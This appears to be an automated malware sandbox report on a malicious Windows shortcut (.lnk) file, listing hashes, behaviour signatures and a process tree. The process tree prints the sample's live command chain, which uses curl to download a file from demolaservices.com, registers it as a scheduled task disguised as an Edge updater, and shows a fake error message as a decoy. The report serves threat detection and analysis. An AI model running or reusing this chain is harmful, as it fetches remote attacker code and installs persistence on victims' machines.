Overview

overview

7

Static

static

1

414d6ed63b...85.lnk

windows7-x64

3

414d6ed63b...85.lnk

windows10-2004-x64

7

Resubmissions

06-03-2024 15:01

240306-sdvz9sbf8t 7

06-03-2024 14:59

240306-sc3cysah54 3

06-03-2024 14:41

240306-r2taxagc37 7

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-03-2024 14:41

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    414d6ed63baaaa69a555068e91e1ee89dbcf38cac7ac4918f6e50fb82d039485.lnk

  • Size

    2KB

  • MD5

    10f4479d5f531def842a712277ae9611

  • SHA1

    bdb075abba517e216a41933cec5b30b4d50c0e76

  • SHA256

    414d6ed63baaaa69a555068e91e1ee89dbcf38cac7ac4918f6e50fb82d039485

  • SHA512

    5306675e38c391bb39a9b4a7bbcbeaf807e2e10bd8e1d5e560e49c77802946b39f033f653954db998d130edb08fc1add8b4dd199c4ab019c4e33fd25fcb57382

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious use of WriteProcessMemory 10 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\414d6ed63baaaa69a555068e91e1ee89dbcf38cac7ac4918f6e50fb82d039485.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:944
    • C:\WINDOWS\system32\conhost.exe
      "C:\WINDOWS\system32\conhost.exe" --headless cmd /c curl -o C:\Users\Public\Documents\config.xml demolaservices.com/mml.php & schtasks /create /tn MicrosoftEdgeUpdateEngine /xml C:\Users\Public\Documents\config.xml & msg * "Incompatible Windows version. Try another Windows PC."
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2332
      • C:\WINDOWS\system32\cmd.exe
        cmd /c curl -o C:\Users\Public\Documents\config.xml demolaservices.com/mml.php & schtasks /create /tn MicrosoftEdgeUpdateEngine /xml C:\Users\Public\Documents\config.xml & msg * "Incompatible Windows version. Try another Windows PC."
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4324
        • C:\Windows\system32\curl.exe
          curl -o C:\Users\Public\Documents\config.xml demolaservices.com/mml.php
          4⤵
            PID:3600
          • C:\Windows\system32\schtasks.exe
            schtasks /create /tn MicrosoftEdgeUpdateEngine /xml C:\Users\Public\Documents\config.xml
            4⤵
            • Creates scheduled task(s)
            PID:3276
          • C:\Windows\system32\msg.exe
            msg * "Incompatible Windows version. Try another Windows PC."
            4⤵
              PID:1772
      • C:\Windows\System32\rundll32.exe
        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        1⤵
          PID:2604

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Public\Documents\config.xml
          Filesize

          2KB

          MD5

          1937af09268af0f1ee47eabb62a28f2c

          SHA1

          551433d0819679f3f37e370e2b51e35336194c80

          SHA256

          1ba020416e58b45e42a854dace76cca56bebbdeebfd0abdfb4a33c12a22390d4

          SHA512

          093b9f5a4ff6fe00b7bd2ed113e220f19cc0a96ac2eaf4993ca62a05706a955353a7a7cbaa86f7630883fd680cfb95107249be42da69c94259742d6284f7b94c

          Download Submit